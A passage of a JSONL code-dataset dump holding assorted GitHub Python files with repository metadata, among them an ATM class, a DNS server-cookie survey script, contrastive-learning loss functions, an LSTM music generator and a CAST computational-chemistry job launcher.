\"\"\"CREATE TABLE dflight(\n id integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n icao varchar(8),\n callsign varchar(10),\n country varchar(100),\n updated DATETIME\n );\"\"\"\n cur.execute(sql)\n print('dflight created')\nfor state in states:\n sql = \"\"\"INSERT INTO dflight (icao, callsign, country, updated)\n VALUES(?, ?, ?, ?);\"\"\"\n cur.execute(sql, (state[0], state[1], state[2], ctime))\nconn.commit()\nconn.close()\n","repo_name":"ebikdeli/flytech","sub_path":"assets/flight_data.0eba16b8e7c5.py","file_name":"flight_data.0eba16b8e7c5.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39932033375","text":"class Solution:\n def merge(self, intervals):\n l = sorted(intervals, key = lambda x:(x[0], x[1]))\n res = []\n for i in range(len(l)):\n low, high = l[i][0], l[i][1]\n if res and low <= res[-1][1]:\n res[-1][1] = max(res[-1][1], high)\n else:\n res.append([low, high])\n return res","repo_name":"mihir254/LeetCode","sub_path":"Medium/56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30594513347","text":"from account import Bank\n\nclass ATM:\n\n def __init__(self, screen, card_reader, cash_dispenser,\n cheque_deposit_slot, cash_deposit_slot, 
printer):\n self.amount = 0\n self.screen = screen\n self.card_reader = card_reader\n self.cash_dispenser = cash_dispenser\n self.cash_deposit_slot = cash_deposit_slot\n self.cheque_deposit_slot = cheque_deposit_slot\n self.printer = printer\n self.account = None\n bank=Bank()\n bank.prepare_bank()\n\n def add_cash(self, amount):\n self.amount = amount\n\n def add_cash_customer(self, amount):\n self.amount += amount\n self.account.add_cash(amount)\n\n def debit_cash(self, amount):\n if self.account.amount < amount:\n raise Exception(\"you dont have enough cash\")\n\n if amount > self.amount:\n raise Exception(\"Not Enough Cash in atm\")\n self.amount -= amount\n self.account.amount -= amount\n\n def detail(self):\n msg = \"amount :\" + str(self.amount)\n self.screen.print_(msg)\n\n def enquiry(self):\n self.account.enquiry()\n\n def transfer(self, account_no, amount):\n bank = Bank()\n transfer_account = bank.get_account_by_no(account_no)\n self.account.check_amount_enough(amount)\n self.account.debit_cash(amount)\n transfer_account.add_cash(amount)\n","repo_name":"rnshaikh/SSD","sub_path":"ATM/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6290551652","text":"import sys\nsys.setrecursionlimit(10**5)\n\nN, M = map(int, sys.stdin.readline().split())\n\nboard = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n\n\nisVisits = [[False for _ in range(M)] for _ in range(N)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef dfs(x, y):\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and isVisits[nx][ny]:\n isVisits[nx][ny] = False\n if board[nx][ny]:\n dfs(nx, ny)\narea = 0\nwhile True:\n area += 1\n for x in range(N):\n for y in range(M):\n if board[x][y]:\n isVisits[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and not isVisits[nx][ny]:\n if not board[nx][ny]:\n board[x][y] -= 1\n if board[x][y] == 0:\n break\n print(*board, sep='\\n')\n check = 0\n for x in range(N):\n for y in range(M):\n if board[x][y] and isVisits[x][y]:\n dfs(x, y)\n check += 1\n elif not board[x][y] and isVisits[x][y]:\n isVisits[x][y] = False\n\n if check >= 2:\n print(area)\n break\n elif check == 0:\n print(0)\n break\n\n","repo_name":"saint6839/jungle-week-03","sub_path":"Week03/saint6839/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35078600685","text":"# Register your models here.\nfrom django.contrib import admin\nfrom .models import Body,TurorialCategory,TurorialSeries,Turorial\n\nclass ProductAdmin(admin.ModelAdmin):\n\tlist_display=['title','tutorial_slug','published']\t\n\tclass Meta:\n\t\tmodel= Turorial\n\nadmin.site.register(Body)\nadmin.site.register(TurorialSeries)\nadmin.site.register(TurorialCategory)\nadmin.site.register(Turorial,ProductAdmin)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#class PlaceAdmin(admin.ModelAdmin):\n#\tsearch_fields=['name','description']\n#\tlist_editable=['price','active','featured']\n#\tclass Meta:\n#\t\tmodel= Places\n\n#class BodyAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured','updated']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Body\n\n#class 
QuotepicsAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Quotepics\n\n\n\n\n#admin.site.register(Places,PlacesAdmin)\n#admin.site.register(DiscountField)\n\n\n\n#from . import models\n#from .models import Places,DiscountField,Body,Quotepics\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from .models import Product,ProductImage,HomePage\n\n#class ProductAdmin(admin.ModelAdmin):\n#\tsearch_fields=['title','description','slug']\n#\tlist_display=['title','price','active','updated']\n#\tlist_editable=['price','active']\n#\tclass Meta:\n#\t\tmodel= Product\n\n#admin.site.register(Product,ProductAdmin)\n\n#admin.site.register(ProductImage)\n\n#admin.site.register(HomePage)","repo_name":"shivamsjjha/django_product_management_app","sub_path":"products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28506185644","text":"\"\"\"\nA multivariate Student-t PDF.\n\nAuthor:\n Panagiotis Tsilifis\n\nDate:\n 6/5/2014\n\n\"\"\"\n\n\n__all__ = ['MultivariateT']\n\n\nimport numpy as np\nimport math\nimport scipy.linalg\nfrom scipy import special\nfrom . import make_vector\nfrom . import call_many\nfrom . import PDFBase\n\n\nclass MultivariateT(PDFBase):\n\n \"\"\"\n A class representing the PDF of a multivariate Normal distribution.\n\n :param mu: The location of the distribution.\n :type mu: :class:`numpy.ndarray`\n :param C: The scale matrix. It is taken to be the unit matrix,\n if it is not specified.\n :type C: :class:`numpy.ndarray`\n\n :param nu: The degrees of freedom\n :type nu: Integer\n\n \"\"\"\n\n # The location\n _mu = None\n\n # The scale matrix\n _C = None\n\n # The degrees of freedom\n _nu = None\n\n # The Cholesky decomposition of C\n _L = None\n\n # The log of determinant of C\n _log_det_C = None\n\n # The inverse of C\n _inv_C = None\n\n @property\n def mu(self):\n \"\"\"\n :getter: The location of the distribution. Internally, it is represented\n as a row matrix.\n :setter: Set mu.\n \"\"\"\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\"\n Set mu.\n \"\"\"\n value = make_vector(value)\n assert value.shape[0] == self.num_dim\n self._mu = value\n\n @property\n def C(self):\n \"\"\"\n :getter: The scale matrix.\n :setter: Set scale matrix.\n \"\"\"\n return self._C\n\n @C.setter\n def C(self, value):\n \"\"\"\n Set the covariance matrix\n \"\"\"\n assert value.ndim == 2\n assert value.shape[0] == self.num_dim and value.shape[1] == self.num_dim\n self._C = value\n # If the following fails, then we have a rank defficient covariance\n try:\n self._L = scipy.linalg.cho_factor(self.C, lower=True)\n self._inv_C = scipy.linalg.cho_solve(self.L, np.eye(self.num_dim))\n self._log_det_C = 2. * np.sum(np.log(np.diag(self.L[0])))\n except scipy.linalg.LinAlgError as e:\n # In this case, we need to find any matrix L such that C = L * L^T.\n # Only sampling will work. 
The log PDF, the gradient and the Hessian are\n # garbage in this case.\n self._inv_C = np.zeros((self.num_dim, self.num_dim))\n self._log_det_C = 0.\n lam, V = scipy.linalg.eigh(self.C)\n idx = lam > 1e-10\n lam = lam[idx]\n V = V[:, idx]\n L = np.dot(V, np.diag(np.sqrt(lam)))\n Cp = np.dot(L, L.T)\n self._L = (L, None)\n\n @property\n def L(self):\n \"\"\"\n :getter: The Cholesky decomposition of C.\n \"\"\"\n return self._L\n\n @property\n def log_det_C(self):\n \"\"\"\n :getter: The logarithm of the determinant of ``C``.\n \"\"\"\n return self._log_det_C\n\n @property\n def inv_C(self):\n \"\"\"\n :getter: The inverse of ``C``.\n \"\"\"\n return self._inv_C\n\n @property\n def nu(self):\n \"\"\"\n :getter: The degrees of freedom.\n :setter: Set nu.\n \"\"\"\n return self._nu\n\n @nu.setter\n def nu(self, value):\n \"\"\"\n Set nu.\n \"\"\"\n #assert isinstance(value, int)\n self._nu = value\n\n def __init__(self, mu, nu, C=None, name='Multivariate Student-t'):\n \"\"\"\n Initialize the object.\n \"\"\"\n self._mu = make_vector(mu)\n super(MultivariateT, self).__init__(self.mu.shape[0], name=name)\n if C is None:\n C = np.eye(self.num_dim)\n self.C = C\n self.nu = nu\n # const is the part of the likelihood that does not depend on any parameter\n self._const = -0.5 * self.num_dim * math.log(math.pi)\n\n def _eval(self, x):\n \"\"\"\n Evaluate the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n z1 = -np.log(special.gamma(self.nu / 2.))\n z2 = -0.5 * self.num_dim * np.log(self.nu)\n z3 = -0.5 * (self.nu + self.num_dim) * np.log(1. + np.dot(t.T, t) / self.nu)\n z4 = np.log(special.gamma((self.nu + self.num_dim) / 2.))\n return z1 + z2 + self._const - 0.5 * self.log_det_C + z3 + z4\n\n def _eval_grad(self, x):\n \"\"\"\n Evaluate the gradient of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)[None, :]\n return (self.nu + self.num_dim) * res / (quadr * self.nu)\n\n def _eval_hessian(self, x):\n \"\"\"\n Evaluate the Hessian of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)\n return (self.nu + self.num_dim) * ( 2. 
* np.dot(res, np.transpose(res)) / quadr - self.inv_C ) / (quadr * self.nu)\n\n def _eval_grad_mu(self, x):\n \"\"\"\n Evaluate the gradient with respect to mu at x.\n \"\"\"\n return -self._eval_grad(x)\n\n def grad_mu(self, x):\n \"\"\"\n Evaluate the derivative with respect to mu at x.\n \"\"\"\n return call_many(x, self._eval_grad_mu)\n\n def __str__(self):\n \"\"\"\n Return a string representation of the object.\n \"\"\"\n s = super(MultivariateT, self).__str__() + '\\n'\n s += 'mu:\\n'\n s += str(self.mu) + '\\n'\n s += 'C:\\n'\n s += str(self.C) + '\\n'\n s += 'nu:\\n'\n s += str(self.nu)\n return s\n","repo_name":"ebilionis/variational-reformulation-of-inverse-problems","sub_path":"vuq/_multivariate_t.py","file_name":"_multivariate_t.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"5611439532","text":"import glm\nimport os\nimport sys\n\n# sys.path.append(os.path.dirname(__file__) + \"/../\")\nsys.path.append(sys.path[0] + \"/../\")\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom Source.System.gameObject import *\n\n\nclass GameObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # texture obj\n self.Texture = \"\"\n self.Color = glm.vec3(1.0, 1.0, 1.0)\n # flags\n self.IsSolid = False\n self.Destroyed = False\n\n def Draw(self, system):\n system.SpriteRenderer.DrawNoTex(self.position, self.Size,\n self.Rotation, self.Color, self.Grid, self.Selected)\n\n\nclass BallObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # ball attributes\n self.Radius = float(0)\n self.Stuck = True\n\n def BallMove(self, dt, window_width):\n if not self.Stuck:\n self.position = self.position + (self.Velocity * dt)\n\n if self.position.x <= 0.0:\n self.Velocity.x = -self.Velocity.x\n self.position.x = 0.0\n\n elif (self.position.x + self.Size.x) >= window_width:\n self.Velocity.x = -self.Velocity.x\n self.position.x = window_width - self.Size.x\n\n if self.position.y <= 0.0:\n self.Velocity.y = -self.Velocity.y\n self.position.y = 0.0\n\n return self.position\n\n def Reset(self, position, velocity):\n self.position = position\n self.Velocity = velocity\n self.Stuck = True\n\n\n","repo_name":"KingAiba/FYPEngine","sub_path":"Game/GameObjectV2.py","file_name":"GameObjectV2.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72587348809","text":"\"\"\"\nBase script for measuring whether IPs return server cookies.\nBy default, we'll retry the server a number of times if errors are received\n\"\"\"\n\nimport argparse\nimport json\nimport multiprocessing as mp\nimport signal\nimport sys\nimport time\nfrom typing import Union\n\nimport dns.resolver\nfrom dns.edns import GenericOption\nfrom dns.message import make_query\nfrom shared.query_parser_generator import QnameParserGenerator\nfrom tqdm import tqdm\n\nCLIENT_COOKIE_LENGTH = 8\nCOOKIE_OPT = 10\nCOOKIE = \"1e4ddeb526a1da40\"\njson_keys = [\"ip\", \"domain\", \"edns\", \"ccook\", \"scook\", \"slen\", \"rcode\", \"err\", \"isbind\", \"tsdiff\"]\n\n\nclass QPG(QnameParserGenerator):\n \"\"\" defines query format to include timestamp and og ip \"\"\"\n label_str = \"$key.$ts.$ip\"\n\n\ndef makedict(default=None):\n return {key: default for key in json_keys}\n\n\ndef make_cookie_query(qname: str, cookie_hex: str = COOKIE) -> dns.message:\n cookie = GenericOption(COOKIE_OPT, bytes.fromhex(cookie_hex))\n return 
make_query(qname, dns.rdatatype.A, use_edns=True,\n want_dnssec=False, options=[cookie])\n\n\ndef extract_cooks(r: dns.message.Message) -> (str, str):\n for o in r.options:\n if o.otype == COOKIE_OPT:\n return o.data[:8].hex(), o.data[8:].hex()\n return \"\", \"\"\n\n\ndef is_using_bind(scook: str, current_timestamp: int = None) -> Union[None, int]:\n \"\"\"\n Returns true if the server cookie is 128 bits and has a timestamp at the 5th-8th bytes.\n Bind or bind-like implementations have a timestamp at that location.\n Tolerance for the timestamp is 1hr in past and 30 min in future being valid. This seemed like a good range to use.\n\n :param scook: the cookie returned by the server\n :param current_timestamp: the timestamp to compare against. If none, gets current time\n :return: the difference between the bind ts and current time if bind, else None\n \"\"\"\n if len(scook) != 32: # bind cookie is 128 bits = 16 bytes = 32 hex characters\n return None\n cookie_timestamp = int(scook[8:16], 16)\n if current_timestamp is None:\n current_timestamp = int(time.time())\n if (current_timestamp - 60 * 60) <= cookie_timestamp <= (current_timestamp + 60 * 30):\n return cookie_timestamp - current_timestamp\n return None\n\n\ndef query(input_dict, try_again=5):\n \"\"\"\n :param input_dict: should contain an ip and domain key. IP will be queried for an A record of domain\n :param try_again: if greater than 0, retry up to N times if an error or no server cookie\n :return: a response dict with all relevant data\n \"\"\"\n res = makedict()\n res[\"ip\"] = input_dict[\"ip\"]\n if input_dict['domain'] is None:\n res['domain'] = QPG.gen('cookie-support.example.com', ip_addr=res['ip'], val=try_again)\n else:\n res[\"domain\"] = input_dict[\"domain\"] if \"domain\" in input_dict else input_dict[\"zone\"]\n\n q = make_cookie_query(res[\"domain\"])\n try:\n r: dns.message.Message = dns.query.udp(q, input_dict[\"ip\"], timeout=5)\n except Exception as e:\n if try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"err\"] = str(e)\n else:\n res[\"ccook\"], res[\"scook\"] = extract_cooks(r)\n if res[\"scook\"] == \"\" and try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"tsdiff\"] = is_using_bind(res[\"scook\"])\n res[\"rcode\"] = r.rcode()\n res[\"edns\"] = r.edns >= 0\n res[\"isbind\"] = res[\"tsdiff\"] is not None\n res[\"slen\"] = len(res[\"scook\"]) / 2\n\n return res\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=\"Run a series of dns queries on a list of IPs and record cookie info\")\n parser.add_argument('input', help=\"Input file containing a json lines with ip and optional domain keys. 
\"\n \"An 'A' query for 'domain' will be sent to 'ip'\")\n parser.add_argument('output', help=\"Output file to write results to\")\n parser.add_argument('-n', '--num-threads', help=\"Number of threads to execute queries\", default=64, type=int)\n parser.add_argument('-g', '--gen-domains', help=\"Generate domains to query for instead of getting from jsonl\",\n action='store_true')\n args = parser.parse_args(args)\n\n print(\"Getting targets...\")\n with open(args.input, 'r') as in_file:\n targets = [json.loads(t) for t in in_file.readlines()]\n if args.gen_domains:\n for t in targets:\n t[\"domain\"] = None\n\n threads = min(args.num_threads, len(targets))\n\n print(\"Starting threads...\")\n with open(args.output, 'w') as output:\n with mp.Pool(processes=threads, initializer=lambda: signal.signal(signal.SIGINT, signal.SIG_IGN)) as p:\n try:\n for result in tqdm(p.imap_unordered(query, targets), total=len(targets), unit=\"query\"):\n output.write(json.dumps(result) + \"\\n\")\n except KeyboardInterrupt:\n p.terminate()\n p.join()\n print(\"Exiting early from queries.\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"byu-imaal/dns-cookies-pam21","sub_path":"cookie_support.py","file_name":"cookie_support.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19950812810","text":"import torch\nimport torch.nn.functional as F\n\ndef oneway_infonce_loss(a, b, t, smoothing=0.0, labels=None):\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n loss = F.cross_entropy(logits, labels, label_smoothing=smoothing).mean()\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n accuracy = torch.sum(preds == labels) / len(a)\n \n return loss, accuracy\n\ndef infonce_loss(a, b, t, smoothing=0.0, labels=None):\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n '''\n if labels is not None:\n loss_a = F.cross_entropy(logits.T, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n loss_b = F.cross_entropy(logits, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n\n loss = (loss_a + loss_b) / 2\n else:'''\n loss = (F.cross_entropy(logits.T, gt, label_smoothing=smoothing).mean() +\n F.cross_entropy(logits, gt, label_smoothing=smoothing).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n\ndef flatnce_loss(a, b, t, smoothing=0.0, labels=None):\n #from https://github.com/Junya-Chen/FlatCLR/blob/main/flatclr.py\n\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T))# * torch.exp(t).clamp(max=100)\n labels = torch.arange(0, batch_size, device=logits.device)\n\n # discard the main diagonal from both: labels and similarities matrix\n mask = 1 - torch.eye(batch_size).to(logits.device) # Positive and negative example similarities\n logits_pos = torch.diagonal(logits).view(batch_size, -1) # Get positive similarities\n\n clogits_a = mask * (logits - logits_pos) * torch.exp(t).clamp(max=100, min=-100)\n clogits_b = mask * (logits.T - logits_pos) * torch.exp(t).clamp(max=100, min=-100) \n\n sum_a = torch.logsumexp(clogits_a, dim=1) - 1 # To offset exp(0) per row\n sum_b = torch.logsumexp(clogits_b, dim=1) - 1 \n sum_clogits = torch.cat([sum_a, 
sum_b], dim=0)\n\n loss_vector = torch.exp(sum_clogits-sum_clogits.detach())\n \n with torch.no_grad():\n dummy_logits = logits * mask\n dummy_loss = (F.cross_entropy(dummy_logits.T, labels, label_smoothing=smoothing).mean() +\n F.cross_entropy(dummy_logits, labels, label_smoothing=smoothing).mean()) / 2\n\n loss = loss_vector.mean() - 1 + dummy_loss\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == labels) +\n torch.sum(preds_t == labels)) / (batch_size * 2)\n\n return loss, accuracy\n\nclass SupConLoss(torch.nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, t_0=0.07, eps=1e-8):\n super(SupConLoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n self.epsilon = eps\n\n\n def forward(self, features, labels):\n \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n Returns:\n A loss scalar.\n \"\"\"\n batch_size = features.shape[0]\n\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(features.device)\n\n views = features.shape[1] # = n_views\n full_features = torch.cat(torch.unbind(features, dim=1), dim=0) # = [bsz*views, ...]\n\n # compute logits (cosine sim)\n anchor_dot_contrast = torch.matmul(F.normalize(full_features),\n F.normalize(full_features.T)) * torch.exp(self.temperature).clamp(100) # = [bsz*views, bsz*views]\n\n loss_0 = self._loss_from_dot(anchor_dot_contrast, mask, views, batch_size)\n loss_1 = self._loss_from_dot(anchor_dot_contrast.T, mask.T, views, batch_size)\n\n return (loss_0 + loss_1) / 2\n\n def _loss_from_dot(self, anchor_dot_contrast, mask, views, batch_size): #(anchor, contrast)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(views, views)\n # mask-out self-contrast cases\n logits_mask = 1 - torch.eye(views*batch_size, device=mask.device)\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True) + self.epsilon)\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n loss = - mean_log_prob_pos.view(views, batch_size).mean()\n\n return loss\n\nclass InfoNCELoss(torch.nn.Module):\n def __init__(self, t_0=0.07, eps=1e-8):\n super(InfoNCELoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n\n def forward(self, anchors, replicas):\n batch_size = anchors.shape[0]\n logits = (F.normalize(anchors) @ F.normalize(replicas.T)) * torch.exp(self.temperature).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n\n loss = (F.cross_entropy(logits.T, gt).mean() +\n F.cross_entropy(logits, gt).mean()) / 2\n\n with torch.no_grad():\n 
preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n","repo_name":"jahuerta92/authorship-embeddings","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"27657232498","text":"import copy\nimport numpy as np\nimport tensorflow as tf\nfrom keras import Input, Model\nfrom keras.layers import Bidirectional, Dense, Dropout, LSTM\nfrom keras.optimizers import Adam\n\nfrom examples import remove_rhythm\nfrom musicLoading import make_midi, load_data\n\ndef get_model_to_train():\n inputs = Input(shape=(256,8), dtype=tf.int64)\n # inputs = Input(shape=X_train[0].shape)\n\n lstm = Bidirectional(LSTM(124), merge_mode='concat', dtype=tf.int64)(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n\n model = Model(inputs=inputs, outputs=[pred])\n opt = tf.keras.optimizers.Adam(lr=1e-3, decay=1e-5)\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n\ndef recursive_predic(model, startingData):\n result = copy.deepcopy(startingData)\n\n result.append([85,84,83,82,81,80,0,0])\n\n curData = copy.deepcopy(startingData)\n for i in range(16 * 32):\n curData = np.array([curData])\n newNotes = model.predict(curData)[0]\n notes = [0] * 8\n\n noteCount = 0\n\n for note in range(len(newNotes)):\n if newNotes[note] > .25:\n notes[noteCount] = note\n noteCount+=1\n if noteCount == 8:\n break\n\n result.append(notes)\n curData = np.delete(curData[0], 0, axis=0)\n curData = np.append(curData, [notes], axis=0)\n # curData = np.array([curData)\n\n print(\"Raw results\", result)\n\n return result\n\ndef results_to_midi(results):\n quantized = []\n\n for beat in results:\n curBeatNotes = []\n\n for note in beat:\n if note == 0:\n break;\n\n curBeatNotes.append([note + 21, 1])\n\n quantized.append(curBeatNotes)\n\n midi = make_midi(quantized, 480)\n midi.open(\"single notes.mid\", 'wb')\n midi.write()\n\nif __name__ == '__main__':\n session = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n # print(device_lib.list_local_devices())\n\n input_size = 256\n\n\n\n inputs = Input(shape=(256,8))\n lstm = Bidirectional(LSTM(124), merge_mode='concat')(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n model = Model(inputs=inputs, outputs=[pred])\n opt = Adam(lr=1e-3, decay=1e-5)\n\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n model.load_weights('best_weights.hdf5')\n\n\n midData = load_data(\"/home/whomagoo/github/MLMusic/Music/kunstderfuge.com/scarlatti 109.mid\")\n\n notes = remove_rhythm(midData)\n notes = notes[:input_size]\n\n # starting_notes = [[72, 64, 0, 0, 0, 0, 0, 0], [72, 69, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [63, 0, 0, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [68, 71, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [84, 72, 57, 0, 0, 0, 0, 0]]\n # padded_input = [[0] * 8] * (input_size - len(starting_notes)) + starting_notes\n\n i = 0\n for chord in notes:\n j = 0\n for note in chord:\n if note != 0:\n notes[i][j] -= 21\n\n j+=1\n i+=1\n\n results = recursive_predic(model, notes)\n\n print(results)\n\n results_to_midi(results)\n\n 
session.close()","repo_name":"WHOmagoo/Machine-Learning-Music","sub_path":"src/first_version.py","file_name":"first_version.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35914004390","text":"import unittest\nimport os\nfrom .helper import UtilityMethods\nimport multisite\n\n\nclass TestLocal(UtilityMethods):\n def test_add_local_site(self):\n config_file = os.path.join(self.workspace, 'add_local_site.json')\n msite = multisite.Multisite(config_file=config_file)\n msite.add_site('local', 'local-site', source_type='local')\n expected = {\n \"local\": {\n \"name\": \"local\",\n \"source\": \"local-site\",\n \"location\": \"local-site\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_existing_config_file(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n expected = {\n \"local-site\": {\n \"name\": \"local-site\",\n \"source\": \"local-site/\",\n \"location\": \"local-site/\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_bad_directory_path(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n with self.assertRaises(OSError):\n msite.add_site(\n 'bad-dir',\n os.path.join('archives', 'zip-site.zip'),\n source_type='local'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cmccandless/multisite","sub_path":"tests/local_test.py","file_name":"local_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7368187078","text":"# list of parameters (in this case torsional angle Y)\nPARAMETER_LIST = range(-180, 185, 5)\n\n# user defined function to start a job, depending on one element from PARAMETER_LIST\ndef run_calc(param):\n \n # modules necessary for running the job\n import os\n import shutil\n \n # user variables for calculation\n PLACEHOLDER = \"RESTRAINT_2\" # placeholder in CAST.txt file that is replaced by step number\n \n # create folder for current window\n os.mkdir(\"f_{}\".format(param))\n\n # copy necessary files to that folder (USER INPUT)\n shutil.copy(\"CAST.txt\", \"f_{}/CAST.txt\".format(param))\n shutil.copy(\"pentan.arc\", \"f_{}/pentan.arc\".format(param))\n shutil.copy(\"charmm22.prm\", \"f_{}/charmm22.prm\".format(param))\n shutil.copy(\"/home/susanne/CAST/optional_files/build/CAST_linux_x64_release\",\n \"f_{}/CAST.exe\".format(param))\n \n # important: set correct parameter in inputfile\n with open(\"f_{}/CAST.txt\".format(param)) as inp:\n x = inp.read()\n x = x.replace(PLACEHOLDER,str(float(param)))\n with open(\"f_{}/CAST.txt\".format(param),\"w\") as inp:\n inp.write(x)\n \n # submit calculation\n os.chdir(\"f_{}\".format(param))\n os.popen(\"chmod +x CAST.exe\")\n os.popen(\"./CAST.exe | tee CAST_OUTPUT.txt\")\n os.chdir(\"..\")\n\n\n########################################### PROGRAM 